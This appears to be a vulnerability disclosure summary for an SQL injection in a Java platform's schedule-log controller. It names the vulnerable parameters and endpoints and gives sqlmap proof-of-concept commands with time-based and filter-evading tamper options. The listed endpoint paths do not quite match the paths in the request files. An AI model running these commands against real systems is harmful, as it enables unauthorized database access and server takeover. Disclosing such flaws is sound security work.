### Key Information Summary #### Vulnerability Overview - **Vulnerability Type**: SQL Injection Vulnerability - **Affected Version**: Latest version, specifically commit (2025-06-29): cafaccf - **Description**: In the latest version, two parameters passed to `sanitized` are not using prepared statements, leading to an SQL injection vulnerability. Attackers can exploit this vulnerability to take control of the server. #### Vulnerability Details - **Tested Version**: commit (2025-06-29): cafaccf - **Vulnerable Endpoints and Parameters**: - `http://127.0.0.1:8090/sys/schedule/log?beanName=1` - `http://127.0.0.1:8090/sys/schedule/LogList?methodName=1` - **Taint Analysis**: - Related Code File: `com/platform/controller/ScheduleJobLogController.java` - Methods: `queryPage` and `queryPagePlus` - XML Mapping File: `ScheduleJobLogDao.xml` #### POC - sqlmap - **Command Examples**: ```bash python sqlmap.py -r request1.txt -p beanName --technique=T --time-sec=5 --tamper='charencode,between' python sqlmap.py -r request2.txt -p methodName --tamper=charencode,between --level 5 --flush-session ``` - **Request Examples**: - `request1.txt`: Contains HTTP request for `/sys/schedule/log/list?beanName=1` - `request2.txt`: Contains HTTP request for `/sys/schedule/log/list?methodName=1` #### Impact - **Link**: [Impact of a Successful SQL Injection Attack](https://portswigger.net/web-security/sql-injection/what-is-the-impact-of-a-successful-sql-injection-attack)